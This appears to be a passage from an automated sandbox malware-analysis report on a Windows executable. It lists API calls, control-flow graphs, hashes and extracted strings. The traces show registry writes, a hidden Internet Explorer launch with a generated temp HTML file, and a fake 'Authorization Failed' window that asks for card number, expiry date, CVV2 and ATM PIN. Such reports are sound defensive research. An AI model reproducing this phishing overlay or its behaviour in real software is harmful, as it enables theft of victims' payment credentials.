                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E1F
                            • rand.CRTDLL(?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE,?,?,%s\%s.exe), ref: 00403E27
                            • memcpy.CRTDLL(-0042AA4C,0042AA44,00000040,?,?,?,?,?,?,?,10624DD3,?,?,?,?,00406DCE), ref: 00403E52
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmp
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmp
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: rand$memcpy$memset
                            • String ID: +Z})
                            • API String ID: 1341957784-4018127762
                            • Opcode ID: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction ID: df63eb390851271c68cbd719fcc6126871763b87c01c507511359465d0d2d2d2
                            • Opcode Fuzzy Hash: 2b8c7437e1bd7430af5d83ecd7967c4870ae419bfa933bb167626543e718b489
                            • Instruction Fuzzy Hash: A4719E31F042159BCB10CF69DD42A9E7BF5AF88354F584076E901B77A0D23CAA16CBAD

                            Control-flow Graph

                            control_flow_graph 69 404148-404190 RegCreateKeyExA 70 404193-404198 69->70 70->70 71 40419a-4041c2 RegSetValueExA RegCloseKey 70->71
                            APIs
                            • RegCreateKeyExA.ADVAPI32(69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001,00006A14,{79FEACFF-FFCE-815E-A900-316290B5B738},?,?,?,004040F5), ref: 00404189
                            • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72,00000001), ref: 004041AB
                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00429080,69D4CE72,69D4CE72,00000001,00000000,00000000,00000000,000F003F,00000000,00000000,69D4CE72), ref: 004041B9
                            Strings
                            • {79FEACFF-FFCE-815E-A900-316290B5B738}, xrefs: 0040414D
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmp
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmp
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmp
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateValue
                            • String ID: {79FEACFF-FFCE-815E-A900-316290B5B738}
                            • API String ID: 1818849710-4250702572
                            • Opcode ID: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction ID: 412fd7a6ac4860a679fa2010a2fd1b93dd732dea722ee027fa7473d1befc18ea
                            • Opcode Fuzzy Hash: 0b9791cc2bb803e0a6fddded9d2feb4d7971cdb144d1b8de1133cc46446009fc
                            • Instruction Fuzzy Hash: A7018472B00108BBEB114A95CC02FFEBA6AEF44764F250065FA00B71D1C6B1AE519754

                            Control-flow Graph

                            control_flow_graph 72 40365e-403682 GetFileSize LocalAlloc 74 403684-40368a 72->74 75 40368c-40368f 72->75 76 403692-4036b2 ReadFile CloseHandle 74->76 75->76
                            APIs
                            • GetFileSize.KERNEL32(00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72,10624DD3), ref: 00403667
                            • LocalAlloc.KERNEL32(00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000,00000001,297D5A2B,10624DD3,00000001,69D4CE72), ref: 00403674
                            • ReadFile.KERNEL32(00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080,00000000), ref: 0040369A
                            • CloseHandle.KERNEL32(00000000,00000000,10624DD3,00000000,00000000,00000000,00000040,-00000010,00000000,00000000,69D4CE72,80000000,?,00000000,?,00000080), ref: 004036A6
                            Yara matches
                            Similarity
                            • API ID: File$AllocCloseHandleLocalReadSize
                            • String ID:
                            • API String ID: 341201350-0
                            • Opcode ID: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction ID: f40f052c398d65a7c82f7348c4b70b1bbd35af8546e58ac1d0fc8a8e918c22c0
                            • Opcode Fuzzy Hash: 2fd491c6994b402e35e8b9e545411a472b55f40d1e3a5e6431fc85953c0e0c00
                            • Instruction Fuzzy Hash: 4EF01C76F04504BAEB01ABA58C02BDD77789B04319F108467F604B62C1D27D6B119B6E

                            Control-flow Graph

                            control_flow_graph 78 407980-40798f GetCommandLineA 79 407991-4079a4 strchr 78->79 80 4079b4-4079b9 78->80 81 4079a6-4079a9 79->81 82 4079cf-4079dc GetModuleHandleA call 406c29 79->82 83 4079c0 80->83 84 4079bb-4079be 80->84 86 4079ac-4079af 81->86 89 4079e1-4079e3 82->89 88 4079c3-4079c8 83->88 84->83 87 4079b3 84->87 90 4079b1 86->90 91 4079ab 86->91 87->80 88->82 92 4079ca-4079cd 88->92 90->82 91->86 92->82 93 4079c2 92->93 93->88
                            APIs
                            • GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                            • strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                            • GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: CommandHandleLineModulestrchr
                            • String ID:
                            • API String ID: 2139856000-0
                            • Opcode ID: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction ID: bd194e91918afd51b414fff694719a57869652e1cfdb10064340714cce8cfdd4
                            • Opcode Fuzzy Hash: a85f45691ed6f3240fb139f31581347a401a2e524d65f22663fdacfbc6ab9f8e
                            • Instruction Fuzzy Hash: 98F062D1E2C28124FF3162764C4673FAD8A9782754F281477E482F62C2E5BCAD52922B

                            Control-flow Graph

                            control_flow_graph 94 401219 95 40121f-40127f __GetMainArgs call 407980 94->95 97 401284-401293 exit 95->97
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction ID: 1ee26eb31ace3a5089fdf6d32769bdd241f616d51084a453fd18da055c90a8b4
                            • Opcode Fuzzy Hash: 4cf7b12bb1780c75f300c3ebf2e5b3677e9a846ab4eef9a36478d9a0a8233563
                            • Instruction Fuzzy Hash: 52F09670F44300BBDB206F55DD03F167AA8EB08F1CF90002AFA44611D1D67D6420569F

                            Control-flow Graph

                            control_flow_graph 98 40121f-40127f __GetMainArgs call 407980 100 401284-401293 exit 98->100
                            APIs
                            • __GetMainArgs.CRTDLL(0042A020,0042A024,0042A028,00000000,00000000), ref: 00401262
                              • Part of subcall function 00407980: GetCommandLineA.KERNEL32(?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407985
                              • Part of subcall function 00407980: strchr.CRTDLL(00000001,00000022,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 00407997
                              • Part of subcall function 00407980: GetModuleHandleA.KERNEL32(00000000,?,?,?,00401284,0042A020,0042A024,0042A028,00000000,00000000), ref: 004079D1
                            • exit.CRTDLL(00000000), ref: 0040128D
                            Yara matches
                            Similarity
                            • API ID: ArgsCommandHandleLineMainModuleexitstrchr
                            • String ID:
                            • API String ID: 735354517-0
                            • Opcode ID: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction ID: 22fee5bca0d1ee63cc250ffe024ab50772efda8fe48dde45178863df2fdfff2b
                            • Opcode Fuzzy Hash: 3b2f29dedebab105fe7e3300aa923db6c3c370c5ed425738ec8fc91bc5ecbfbb
                            • Instruction Fuzzy Hash: BEF090B0F44300BBDA206F55AC03F1A7AA8EB08B1CFA0002AFA44611E1DA7D6420569F

                            Control-flow Graph

                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405181
                            • lstrlenA.KERNEL32(?,?), ref: 00405195
                            • lstrlenA.KERNEL32(?,?,?), ref: 004051A6
                            • lstrlenA.KERNEL32(?,?,?,?), ref: 004051C4
                            • lstrlenA.KERNEL32(?,?,?,?,?), ref: 004051D5
                            • lstrlenA.KERNEL32(?,?,?,?,?,?), ref: 004051E6
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405218
                            • memset.CRTDLL(?,00000000,00000010,?,?,?,?,?,?), ref: 0040522E
                            • GetTickCount.KERNEL32 ref: 00405239
                            • srand.CRTDLL(00000000,?,00000000,00000010,?,?,?,?,?,?), ref: 0040523F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040526C
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?), ref: 00405290
                            • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000104,?,?,?,?,?,?), ref: 004052D4
                            Strings
                            Yara matches
                            Similarity
                            • API ID: lstrlen$FreeLocal$CountEnvironmentExpandIncrementInterlockedOpenStringsTickmemsetsrand
                            • String ID: %s%u - Microsoft Internet Explorer$7O{M$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 2987844104-963083691
                            • Opcode ID: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction ID: eaf183550e18aa99804e3b29fd782d62b91feccc71c8544a1a81296d936fe118
                            • Opcode Fuzzy Hash: a4e079000a0a70f6da611676ee79104fcc8748fed5030838b847c3b90d393ccd
                            • Instruction Fuzzy Hash: 8E91B471E092186BDF20EB65CC49BDEB779AF40308F1440F6E208B61D1DAB96EC58F59
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405C3C
                            • GetTickCount.KERNEL32 ref: 00405C54
                            • srand.CRTDLL(00000000,?), ref: 00405C5A
                            • InterlockedIncrement.KERNEL32(0042C48C), ref: 00405C69
                            • memset.CRTDLL(?,00000000,00000010,0042C48C,00000000,?), ref: 00405C7F
                              • Part of subcall function 0040429C: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004042D3
                            • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,00000000,?), ref: 00405CC2
                              • Part of subcall function 0040570C: GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,.htm), ref: 00405764
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,<html>), ref: 00405778
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405786
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057AC
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057BE
                              • Part of subcall function 0040570C: sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 004057E7
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405805
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,<head>), ref: 00405819
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 00405827
                              • Part of subcall function 0040570C: strcat.CRTDLL(?,0042CC6C), ref: 00405845
                              • Part of subcall function 0040570C: rand.CRTDLL ref: 0040584D
                            • strcat.CRTDLL(?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405CF7
                            • strcat.CRTDLL(?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D0A
                              • Part of subcall function 0040431F: GetCurrentThreadId.KERNEL32 ref: 00404341
                              • Part of subcall function 0040431F: GetThreadDesktop.USER32(00000000), ref: 00404347
                            • memset.CRTDLL(?,00000000,00000044,?,?,?,\Iexplore.exe ,?,?,00000104,?,?,?,?,00000000,?), ref: 00405D2B
                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405D95
                            • CloseHandle.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DA8
                            • sprintf.CRTDLL(?,%s%u - Microsoft Internet Explorer,MicroSoft-Corp,?,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405DCA
                            • FindWindowA.USER32(IEFrame,?), ref: 00405DED
                            • Sleep.KERNEL32(000003E8,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405DFD
                            • Sleep.KERNEL32(0000F000,IEFrame,?,00000000,00000000,00000044,?,?,?,?,?,?,?,?,?,?), ref: 00405E20
                            • GetWindowTextA.USER32(00000000,?,00000104), ref: 00405E38
                            • CopyFileA.KERNEL32(?,?,00000000), ref: 00405E85
                            • DeleteFileA.KERNEL32(?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EA4
                            • lstrlenA.KERNEL32(<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405EAE
                            • strncmp.CRTDLL(00000000,<HTML><!--,00000000,<HTML><!--,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000), ref: 00405EBA
                            • lstrlenA.KERNEL32(<HTML><!--,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000,00000044,?), ref: 00405ECB
                            • LocalFree.KERNEL32(00000000,?,?,?,?,00000000,?,?,00000000,?,?,0000F000,IEFrame,?,00000000,00000000), ref: 00405F0F
                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F2B
                            • TerminateProcess.KERNEL32(?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F38
                            • CloseHandle.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F49
                            Strings
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$Filelstrlensprintf$CloseDeleteHandleProcessSleepThreadWindowmemset$CopyCountCreateCurrentDesktopEnvironmentExpandFindFreeIncrementInterlockedLocalOpenPathStringsTempTerminateTextTicksrandstrncmp
                            • String ID: %s%u - Microsoft Internet Explorer$<HTML><!--$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 4103625910-1993706416
                            • Opcode ID: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction ID: dc295d18008c6f961fbff17ccdc6ec9b88b81df80f56d8f6893aa762a7281c5f
                            • Opcode Fuzzy Hash: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction Fuzzy Hash: 7B81A8B1E041186ADB20B665CC4ABDEB7BD9F40304F1444F7B608F61D1E6B99F848F59
                            APIs
                            • CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                            • GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                              • Part of subcall function 004013CC: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004013EF
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?), ref: 004054F1
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?), ref: 00405505
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?), ref: 00405513
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                              • Part of subcall function 004054D7: LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                              • Part of subcall function 004054D7: memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                              • Part of subcall function 004054D7: CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                              • Part of subcall function 004054D7: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                              • Part of subcall function 004054D7: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                              • Part of subcall function 00401348: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00401375
                            Strings
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Create$FileThread$AllocCloseCodeExitHandleLocalObjectOpenSingleSizeWaitmemcpy
                            • String ID: Software\Microsoft
                            • API String ID: 3232930010-89712428
                            • Opcode ID: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction ID: db3b40ff5e41acc5bdae17a6e42d24a18e18c948de20eb22515eb7809feee29e
                            • Opcode Fuzzy Hash: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction Fuzzy Hash: C3219972E002097BEB10AE998D42FDEBAA8DB04714F644077FB00B61E1E6B55A108B99

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00405FFA: GetWindow.USER32(?,00000005), ref: 00406019
                              • Part of subcall function 00405FFA: GetClassNameA.USER32(00000000,?,00000FFF), ref: 0040603B
                            • ShowWindow.USER32(00000000), ref: 004060B9
                            • GetWindowRect.USER32(00000000,?), ref: 004060C9
                            • CreateWindowExA.USER32(00000200,QueenKarton,0042CBF0,50800000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004060FF
                            • CreateWindowExA.USER32(00000000,STATIC, Authorization Failed.,50800000,00000014,00000014,?,0000003C,00000000,00000000,00000000,00000200), ref: 00406135
                            • CreateWindowExA.USER32(00000000,STATIC,0042CBF0,50800009,00000014,00000051,?,0000012C,00000000,00000000,00000000,STATIC), ref: 00406179
                            • CreateFontA.GDI32(00000014,00000008,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 004061A2
                            • SendMessageA.USER32(00000030,00000000,00000001,00000000), ref: 004061B4
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,00000014,00000014,00000064,00000064,00000000,00000000,STATIC,0042CBF0), ref: 004061E2
                            • SendMessageA.USER32(00000000,00000143,00000000,MasterCard), ref: 004061FF
                            • SendMessageA.USER32(00000143,00000000,Visa,00000000), ref: 00406216
                            • SendMessageA.USER32(0000014E,00000001,00000000,00000143), ref: 00406233
                            • SendMessageA.USER32(0000014E,00000000,00000000,00000143), ref: 00406249
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,0000007A,00000014,00000032,0000012C,00000000,00000000,0000014E,00000000), ref: 0040627A
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX), ref: 004062B9
                            • sprintf.CRTDLL(?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX,0042CBF0), ref: 004062DF
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 004062F5
                            • sprintf.CRTDLL(?,20%.2u,-00000002,00000143,00000000,?,?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C), ref: 0040630B
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 00406324
                            • CreateWindowExA.USER32(00000000,STATIC,Card && expiration date,50000000,00000114,0000006E,00000081,00000010,00000000,00000000,00000143,00000000), ref: 0040636B
                            • CreateWindowExA.USER32(00000000,STATIC,Your card number,50000000,000000C3,00000087,00000067,00000010,00000000,00000000,00000000,STATIC), ref: 004063AA
                            • CreateWindowExA.USER32(00000000,STATIC,3-digit validation code on back of card (cvv2),50000000,00000064,000000A0,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 004063E3
                            • CreateWindowExA.USER32(00000000,STATIC,ATM PIN-Code,50000000,000000A0,000000B9,00000056,00000010,00000000,00000000,00000000,STATIC), ref: 0040641C
                            • CreateWindowExA.USER32(00000000,STATIC,Unable to authorize. ATM PIN-Code is required to complete the transaction.,50000000,0000001E,000000E6,000001E4,00000010,00000000,00000000,00000000,STATIC), ref: 00406455
                            • CreateWindowExA.USER32(00000000,STATIC,Please make corrections and try again.,50000000,0000001E,000000FF,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 0040648E
                            • CreateWindowExA.USER32(00000200,EDIT,00429180,50800000,00000014,0000002D,00000082,00000018,00000000,00000000,00000000,STATIC), ref: 004064C7
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,00000046,00000028,00000018,00000000,00000000,00000200,EDIT), ref: 00406503
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,0000005F,00000064,00000018,00000000,00000000,00000200,EDIT), ref: 00406539
                            • CreateWindowExA.USER32(00000000,BUTTON,Click Once To Continue,50800000,0000001E,00000140,0000009B,00000017,00000000,00000000,00000200,EDIT), ref: 00406572
                            • CreateFontA.GDI32(00000010,00000006,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 0040659B
                            • SendMessageA.USER32(00000030,00000000,00000001,00000010), ref: 004065B3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065C3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065D3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065E3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065F9
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406609
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406619
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406632
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406642
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406652
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406662
                            • GetWindowLongA.USER32(000000FC,00000030), ref: 0040666F
                            • SetWindowLongA.USER32(000000FC,004077E4,00000000), ref: 00406686
                            • GetWindowLongA.USER32(000000FC,00000001), ref: 00406699
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066B0
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066BD
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066D4
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066E1
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066F8
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406705
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 0040671C
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406732
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 00406749
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1982364047.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                             • Associated: 00000003.00000002.1982345729.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982382134.000000000042A000.00000004.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982403246.000000000042E000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982419453.000000000042F000.00000002.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982436554.0000000000436000.00000020.00000001.01000000.00000006.sdmp
                             • Associated: 00000003.00000002.1982452542.0000000000438000.00000002.00000001.01000000.00000006.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_400000_Opbieagi.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$CreateMessageSend$Long$Fontsprintf$ClassNameRectShow
                            • String ID: Authorization Failed.$%.2u$20%.2u$3-digit validation code on back of card (cvv2)$ATM PIN-Code$BUTTON$COMBOBOX$Card && expiration date$Click Once To Continue$DocObject$EDIT$Explorer$MasterCard$Please make corrections and try again.$QueenKarton$STATIC$Unable to authorize. ATM PIN-Code is required to complete the transaction.$Visa$Your card number
                            • API String ID: 1504929638-2953596215
                            • Opcode ID: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction ID: 07d4a47d2009414dc6278682baa0b56b1decc7bc7d2f3e077783c243e1dcc7f7
                            • Opcode Fuzzy Hash: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction Fuzzy Hash: 43F16F31BC43157AFA212B61ED43FA93A66AF14F44F60413AB700BD0F1DAF92911AB5D

                             Control-flow Graph (function at 0040570C; executed / not executed basic blocks; rendered graph not reproduced)
                            APIs
                            • GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                            • strcat.CRTDLL(?,.htm), ref: 00405764
                            • sprintf.CRTDLL(?,<html>), ref: 00405778
                            • rand.CRTDLL ref: 00405786
                            • strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                            • rand.CRTDLL ref: 004057AC
                            • rand.CRTDLL ref: 004057BE
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                            • rand.CRTDLL ref: 004057E7
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405805
                            • strcat.CRTDLL(?,<head>), ref: 00405819
                            • rand.CRTDLL ref: 00405827
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405845
                            • rand.CRTDLL ref: 0040584D
                            • rand.CRTDLL ref: 0040585F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405880
                            • sprintf.CRTDLL(?,%s<title>%s%u</title>,?,MicroSoft-Corp,?), ref: 004058A3
                            • rand.CRTDLL ref: 004058B1
                            • strcat.CRTDLL(?,0042CC6C), ref: 004058CF
                            • strcat.CRTDLL(?,</head>), ref: 004058E3
                            • rand.CRTDLL ref: 004058EB
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405909
                            • strcat.CRTDLL(?,<body>), ref: 0040591D
                            • rand.CRTDLL ref: 0040592B
                            • rand.CRTDLL ref: 0040593D
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 0040595E
